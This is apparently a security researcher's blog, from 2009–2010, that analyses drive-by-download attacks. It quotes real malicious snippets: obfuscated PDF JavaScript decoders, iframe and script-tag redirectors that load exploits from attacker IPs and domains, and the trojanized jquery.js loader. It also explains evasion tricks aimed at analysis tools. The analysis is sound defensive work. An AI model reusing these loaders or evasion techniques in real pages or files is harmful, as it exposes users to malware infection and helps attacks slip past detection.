blog
April 28, 2010
Tomorrow, I'm going to present our paper Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code at the WWW conference. The paper describes some of the techniques that we use to detect and analyze web pages that perform drive-by-download attacks, such as the ones that we analyze via Wepawet.
Here is the abstract:
JavaScript is a browser scripting language that allows developers to create sophisticated client-side interfaces for web applications. However, JavaScript code is also used to carry out attacks against the user's browser and its extensions. These attacks usually result in the download of additional malware that takes complete control of the victim's platform, and are, therefore, called "drive-by downloads." Unfortunately, the dynamic nature of the JavaScript language and its tight integration with the browser make it difficult to detect and block malicious JavaScript code.
This paper presents a novel approach to the detection and analysis of malicious JavaScript code. Our approach combines anomaly detection with emulation to automatically identify malicious JavaScript code and to support its analysis. We developed a system that uses a number of features and machine-learning techniques to establish the characteristics of normal JavaScript code. Then, during detection, the system is able to identify anomalous JavaScript code by emulating its behavior and comparing it to the established profiles. In addition to identifying malicious code, the system is able to support the analysis of obfuscated code and to generate detection signatures for signature-based systems. The system has been made publicly available and has been used by thousands of analysts.
See you in Raleigh!
February 22, 2010
Another simple trick that is often used by malicious PDF files consists of embedding the malicious JavaScript code in a PDF stream hidden below several stream filters.
Here is an example:
4 0 obj
<<
/Length 2839
/Filter [ /ASCIIHexDecode
/LZWDecode
/ASCII85Decode
/RunLengthDecode
/FlateDecode ]
>>stream
80124E6422E89C7A3517958CC302316CDE
...
08220861102A8595D813C3187E07C40400>
endstream
endobj
The stream's contents are decoded applying the specified 5 filters in
order (ASCIIHexDecode, LZWDecode, ASCII85Decode,
RunLengthDecode, and FlateDecode).
See this Wepawet report to find out what happens after the decoding is done. These malicious PDFs seem to also have decent detection on VirusTotal (6/41, at the time of writing).
February 18, 2010
PDF exploits are becoming more and more sophisticated. In particular, they often rely on creative techniques to avoid detection and slow analysis. For a couple of examples, see Julia Wolf's and Daniel Wesemann's nice analysis of malicious documents that use the getAnnots and info tricks, where the actual malicious content is stored as annotations or as part of the document metadata (e.g., the author name).
Here is another trick that showed up recently. I'll call it the getPageNthWord trick, from the key API function it uses.
The PDF contains a JavaScript section with the following code (simplified a little):
var s = '';
new Function(decode(2, 35))();
function decode(page, xor){
var l = this.getPageNumWords(2);
for(var i = 0; i < l; i++){
word = this.getPageNthWord(page, i);
var c = word.substr(word.length- 2, 2);
var p = unescape("%"+ c).charCodeAt(0);
s += String.fromCharCode(p ^ xor);
}
return s;
}
This code creates an anonymous function, sets its body to the return
value of the decode function, and then executes it.
The interesting part is in the decode function. This function gets the
number of words contained in the third page of the document via the
getPageNumWords function (recall that pages are 0-based in the PDF
API). It then loops through all the words in that page (via the
getPageNthWord function) and manipulates them. Let's see how the third
page looks like:
11 0 obj
<<
/Length 23892
>>
stream
2 J
0.57 w
BT /F2 1.00 Tf ET
0.196 G
BT 31.19 806.15 Td ( kh29 kh2a kh55
...
kh4e kh46 kh0a kh03 kh58 kh2e kh29) Tj ET
...
endstream
endobj
The page is stored as a stream. Its contents comprise a number of
directives and the actual textual content. For example, BT indicates
the beginning of the text and, conversely, ET marks the end of the
text; 31.19 806.15 Td specifies the position of the text on the page;
and Tj is the display text operator. The actual textual content is
the string starting with kh29.
We can now go back to our decode routine. It is clear that it extracts the last
2 characters from each word (e.g., “29” from “kh29”),
interprets them as hex numbers (e.g, 0x29), xors them with 35 (e.g., 0x29 ^ 35
= 10), and finally obtains the corresponding character (e.g., “\n”).
The result of this deobfuscation is the actual exploit code, which targets 4 different vulnerabilities. However, the exploit code has one last trick, which it uses to hide the URL from where the malware is to be downloaded:
var src_table = "abcd...&=%";
var dest_table= "eAFS...=iZR-";
function get_url(){
var str = this.info.author;
var ret = encode_str(str, dest_table, src_table);
return ret;
};
Notice the info.author property. The get_url function essentially
performs a simple substitution decryption of the author metadata. Let's
see what is contained there:
17 0 obj
<<
/Author
(-Jj.gw-Jjrj.-JWMyD-JjTWM-JjngM-JgkjW
...
-JjrWk-Jjrgw-JgTyM-Jy0g.-JWgyg-Jgngw-JgYgY-JyygM-Jy.yC)
>>
endobj
Ugly, indeed. After decoding, one finally gets the malware URL.
Wepawet now handles this type of malicious PDF files. See this report for an example.
December 19, 2009
PDF exploits—mostly targeting Adobe Reader and Acrobat programs—are very commonly used on drive-by web sites. This situation is probably the result of the widespread use of the Adobe plugin, a rather large of number of vulnerabilities found in it, and reliable exploitation techniques.
Two recent vulnerabilities for which I have added detection in Wepawet are CVE-2009-3459 and CVE-2009-4324 (click on the links to see analysis reports of two malicious samples). The former is an integer overflow in the PDF parser, the latter is a bug in the JavaScript interpreter.
The analysis of malicious PDF files is often complicated by the use of various obfuscation (or better, “confusion”) techniques. In particular, malicious PDF files are often malformed: expected sections are missing entirely, others are truncated. The attacks are still successful because Adobe Reader does a good job at automatically repairing the damaged file. Of course, analysis tools are not necessarily as good at that.
I recently found an interesting, small trick that was used in the wild.
A little background first. A stream is a basic object (technically, a
dictionary) used in PDF files to contain arbitrary content. In
particular, malicious PDFs use streams to contain the JavaScript code
used to launch an exploit. The Length entry in the stream dictionary
is used to specify, you guessed it, the length of the encoded content.
According to the PDF specification (Section 7.3.8.2 for the curious), the length
is to be specified as an integer. The sample I found, however,
used an expression (a sum) to declare the stream
length in the length declaration.
obj
<</ / / / /Filter/ASCIIHexDecode/Length 100000+12488>>
stream
... stream contents ...
endstream
endobj
Lessons learned: do not trust specs and be a little lenient in the parsing of PDF files...
Update 1/7/2010: Richard B. pointed out that Acrobat seems to detect that the length specification is malformed, discards it, and falls back to a simple parsing strategy to extract the stream contents. Thanks!
October 14, 2009
Writers of malicious JavaScript code have always been keen on developing novel ways to make the analysis of their code harder. One of the most commonly used mechanisms to do so is (no surprise here) simple obfuscation. For example, malware authors commonly encode string literals with custom schemes. A decoding routine then de-scrambles the strings before using them further (for example, as the URL of the next step of an attack or as the CLSID of a vulnerable ActiveX control).
Interestingly, malware authors have also introduced various techniques to make the basic deobfuscation step more difficult, in particular, if performed in an off-line analysis environment, which, for example, examines the pages saved during a crawling session.
One of the earliest trick consists of using the URL of the obfuscated page as a decoding key in the deobfuscation routine. More recently, other techniques have also been used. One I have seen lately uses the time of the last modification of the page in the decoding routine.
Consider, for example, the following script:
<html><body><script>
var gtvwx=true,abwz="",gnru=false,
bfqrv=document.lastModified.split("/"),
dilp=String,
cjltu=bfqrv[2].split(":"),
acinqu=dilp['f#r(o#mZC#h#aZrZC(o,d#e('.replace(/[\(Z,G#]/g,'')],
gnty=bfqrv[0]+"25"+cjltu[2],
ckoxz=window,cklqry=0,klny="",
bfkw=ckoxz['euv9a2lS'.replace(/[S2u9@]/g,'')],
fopv=[150,173,160...90,94,111],
ailmux=function(){
for(var ehlt;cklqry<fopv.length;cklqry++){
klny+=acinqu(fopv[cklqry]-
gnty.substring(cklqry%gnty.length,cklqry%gnty.length+1).charCodeAt(0));
bfkw(klny);
};
ailmux();
</script></body></html>
The code reads the time the page was last modified from the
document.lastModified property. This property is initialized from the
value of the Last-Modified header sent from the web server serving the
page. The script then parses the time and extracts the number of seconds
from the time string into the cjltu variable.
The seconds value is then used to compute the value of the gnty
variable, which is used in the decoding routine to recover the
in-the-clear text from the encoded array fopv..
These are the Wepawet reports for a couple of sites that use this techniques: report for hxxp://www.pipisechka.com/sleep/news.php and report for hxxp://day-evryday.cn/news.php
October 10, 2009
A new malware campaign is currently abusing BlogSpot. I'll call it the "Mutu" campaign from the text that is found on the malicious pages. I have so far detected almost 400 blogs that are actively involved in the campaign.
A malicious blog looks like the following picture. Note that the actual text, layout, and color themes may vary across different pages.
A malicious page contains a script tag similar to the following:
<script language="javascript">
location.href='\u0068\u0074\u0074\u0070\u003a\u002f\u002f'
+ unescape('%77%77%77%2e%78')+unescape('%78%78%6f%64')
+'\u006e\u006f\u006b\u006c\u0061\u0073'+'sniki'
+unescape('%2e%63%6f%6d%2f')+unescape('%3f%61%64')
+unescape('%76%3d%67%61%72')+'bunov'+''
</script>
The script causes the victim's browser to fetch a malicious (or at least dubious) page from one of several domains. These are the domains that are currently being redirected to:
Some of these domains appear to be selling various items (cell phone,
drugs). However, others (at least afsharteam1.com) launch
drive-by-download attacks. As a result, a malware with limited and
generic detection on
VirusTotal gets downloaded and launched on the
vicitm's machine.
For more details, see the Wepawet report for
bertilladingman36429.blogspot.com,
a blog that redirects to drive-by attacks.
October 8, 2009
Here is another exploit toolkit that has been making the rounds
recently: the Liberty exploit pack. Most notably, in mid-September,
Liberty was used in a drive-by-download campaign that injected iframes
pointing at searra-ditol.cn and embrari-1.cn into a large number of
vulnerable web sites.
A couple of pages from the toolkit admin panel:
Finally, you can see the Wepawet domain report for searra-ditol.cn and for embrari-1.cn.
October 4, 2009
Here is an old trick for foiling manual and automated analysis of malicious pages that I still see used from time to time. When the malicious page is requested, the server sends back a 404 ("Not Found") HTTP status code. Regularly, this error message indicates that the requested resource could not be found on the server, and the returned page simply tries to help the visitor correcting the error. However, in the case of malicious pages that use this trick, the body of the apparently missing page contains code that attempts to exploit some browser vulnerabilities or to redirects to other malicious web sites.
The following is an example of a page (hxxp://yahoo-analytics.net/laso/s.php) that uses this technique:
HTTP/1.1 404 Not Found
Date: Tue, 29 Sep 2009 07:26:41 GMT
Server: Apache/2
Last-Modified: Tue, 01 Sep 2009 12:55:36 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 133
Content-Type: text/html
<iframe src="http://213.163.89.54/lib/index.php"
width=0 height=0
style="hidden"
frameborder=0 marginheight=0 marginwidth=0
scrolling=no>
</iframe>
The headers indicate that the page is missing, but the body contains an iframe that redirects the browser to a page that launches various browser exploits. Of course, stopping the analysis after observing the 404 error code would not reveal any wrongdoing. A complete analysis instead (see the Wepawet report for hxxp://yahoo-analytics.net/laso/s.php for all the details) shows that after the redirection a malicious PDF and Flash files are delivered to the visitor's browser.
September 29, 2009
Long time, no write... but I thought this could be a good occasion to start again.
It looks like the Koobface people have been busy updating their social engineering tricks. But let's start from the beginning. I was inspecting fnplbpnbvxqjrey.blogspot.com, a BlogSpot's blog that Wepawet flagged as suspicious and involved in pushing Koobface (see the Wepawet report for fnplbpnbvxqjrey.blogspot.com). At first sight, the blog appears to be just one of the many BlogSpot pages involved in this activity.
However, a closer look at the source code of the page reveals something interesting. The code responsible for actually redirecting to Koobface is a fairly recent variant (I have seen it used as early as 2009-09-12). Here is a slightly simplified listing of this code:
var ogxbjeqrihscndvz6 = [ /* list of server IPs */ ];
var mzvtonlxsjprcb5 = '';
cvuhxdinmlqjoeft1();
var js = '/view';
var n = location.href.indexOf('?id=');
if (n != -1) {
n = parseInt(location.href.substr(n + 4));
if (n < 101)
js = '/cnet';
else if (n < 201)
js = '/warn';
else if (n < 301)
js = '/scan';
else if (n < 401)
js = '';
}
for (var onwxklrqhybjvpase3 = 0;
onwxklrqhybjvpase3 < ogxbjeqrihscndvz6.length;
onwxklrqhybjvpase3 ++) {
var ypcovhrtbmn8 = document.createElement('script');
ypcovhrtbmn8.type = 'text/javascript';
ypcovhrtbmn8.src = 'http://' + ogxbjeqrihscndvz6[onwxklrqhybjvpase3] +
'/go' + '.js' + '?0x3' + 'E8' + mzvtonlxsjprcb5 + js + '/' +
(location.search.length > 0 ? location.search : '');
document.getElementsByTagName('head')[0].appendChild(ypcovhrtbmn8);
}
The script loops over an array that holds the IPs of compromised
machines where visitors of the malicious blog will be redirected to. For
each IP, an HTML script tag is added to the page. The tag is set to
point to a URL on the compromised IP. Depending on certain conditions,
the path of the URLs will contain one of the following strings: /view,
/cnet, /warn, /scan.
When the redirection finally is triggered, the victim is presented with a
different page, depending on which of these strings was included
in the URL.
All the pages attempt to social engineer visitors into downloading and installing the Koobface malware. Here are screenshots that show the tricks they use:
/view)
/cnet)
/scan)
/warn):
Just a few more aces up Koobface's sleeve...
May 6, 2009
An anti-analysis/fingerprinting trick I've noticed more and more frequently in drive-by downloads is the use of IE conditional compilation.
Conditional compilation is a feature of Internet Explorer that enables the browser to control the compilation of a script (that is, to include or exclude code to be interpreted) depending on the values of a number of conditional compilation variables. Predefined variables provide information about the client environment, such as its processor, OS, and JavaScript version. Conditional compilation statements are typically contained in regular JavaScript comments to prevent problems with browsers that do not support this feature.
Here is an example of how conditional compilation is used in drive-by downloads:
/*@cc_on @*/
/*@if (@_win32)
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6" +
"/23:/255/33:0tubut0tubut/kt#?=0tdsjqu?";
var result = "";
for(var i=0;i<source.length;i++)
result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
/*@end @*/
The cc_on statement enables conditional compilation. The @if
statement checks that the browser is running on a Win32 system. If this
is the case, then the following JavaScript block is interpreted,
otherwise it is simply ignored. The code block is a
classic deobfuscation routine that produces the following text:
<script type="text/javascript"
src="http://95.129.144.229/stats/stats.js"></script>
This script tag fetches a script that redirects to a number of pages serving
exploits.
What happens if the user's browser does not support conditional compilation, for example, it is an analysis tool based on the stock SpiderMonkey or Rhino engines? Then, it will simply consider the entire conditional compilation section a comment and it will skip it. As a consequence, the malicious script tag will not be added to the page, and, therefore, the subsequent exploits will not be launched and will not be detected by the analysis tool.
The full report for the example is available on Wepawet.
May 1, 2009
Malicious JavaScript code often relies on defensive mechanisms to evade detection or to make its deobfuscation more difficult. Some of these methods have been well discussed (see, for example, the very nice presentations Reverse Engineering Malicious Javascript by J. Nazario and Circumventing Automated JavaScript Analysis by B. Hoffman), but it's interesting to see how they are used.
Some of the earliest defensive techniques are directed against the
manual analysis of malicious code. For example, a quick analysis
technique consists of wrapping the script's code into textarea tags so
that deobfuscated code is written into the textarea and can be
quickly inspected and copy-and-pasted for further analysis. In this
case, the textarea is essentially used as a poor-man sandbox. Something
the bad guys figured out quickly was that all they needed to do to
defeat this technique was to close the textarea tag before performing
any other action.
Somewhat surprisingly, this trick is still used from time to time. A few months ago, a malicious script on ixfree.net contained the following code:
document.write("</textarea>");
var i, _, a = ["78.110.175.21", "195.24.76.251"];
_ = 1;
if (document.cookie.match(/\bhgft=1/) == null)
for (i = 0; i < 2; i++)
document.write("<script>if(_)" +
"document.write(\"<script id=_" + i + "_ src=//" + a[i]" +
"/cp/?" + navigator .appName.charAt(0) +
"><\\/script>\")<\/script>");
(see full report on Wepawet)
The code closes the textarea to escape its "sandbox", checks that a cookie is not set, and then generates two script tags that redirect to exploits. If you were to wrap this code into a textarea, you would end up with an empty textarea and a wrong detection.
April 26, 2009
A social engineering trick that the people behind drive-by downloads are using is that of hiding their malicious code in the middle of benign, well-know code.
For example, recently, a number of compromised web sites have found their pages modified with iframes pointing at hxxp://94.247.2.195/jquery.js. At a cursory inspection, jquery.js looks like the jQuery library, a well-known (and definitely benign) JavaScript library. The code includes the standard jQuery's copyright notice and revision information, and the first 6K bytes or so are indeed identical to the original library's code.
/*
* jQuery JavaScript Library v1.3.1
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-01-21 20:42:16 -0500 (Wed, 21 Jan 2009)
* Revision: 6158
*/
(function(){var l=this,g,y=l.jQu...
However, the malicious code is hidden toward the end of the script, where one finds:
if( (typeof(jquery_data)!=typeof(1)) &&
(document.cookie.match(/\miek=1/)==null))
document.write(
unescape('fq%3CssoWcOTHriDpgpsoWt...FH5rscDpgrRpiptRp%3E')
.replace(/soW|VV|U6k|rV|fq|OTH|H5r|Dpg|Rp/g,"")
.replace(/Z/,navigator.appName.charAt(0)=='M'?'0':'1'));
jquery_data=1;
This code determines whether an attack has already been launched, by
checking the jquery_data variable and the miek cookie. If not, it
deobfuscates a long string and writes it in the current page. The
deobfuscated string creates a new script tag which points at
hxxp://94.247.2.195/news/?id= The value of the id parameter in the
script URL is 100 if the codename of the browser starts with the letter M
(e.g., Firefox and Internet Explorer), 101 in all other cases. This
page, in turn, attempts to launch a number of exploits (see the Wepawet
report).
The exploits target vulnerabilities in MDAC, PDF, and SWF.
It's certainly true: thing are not always what they seem...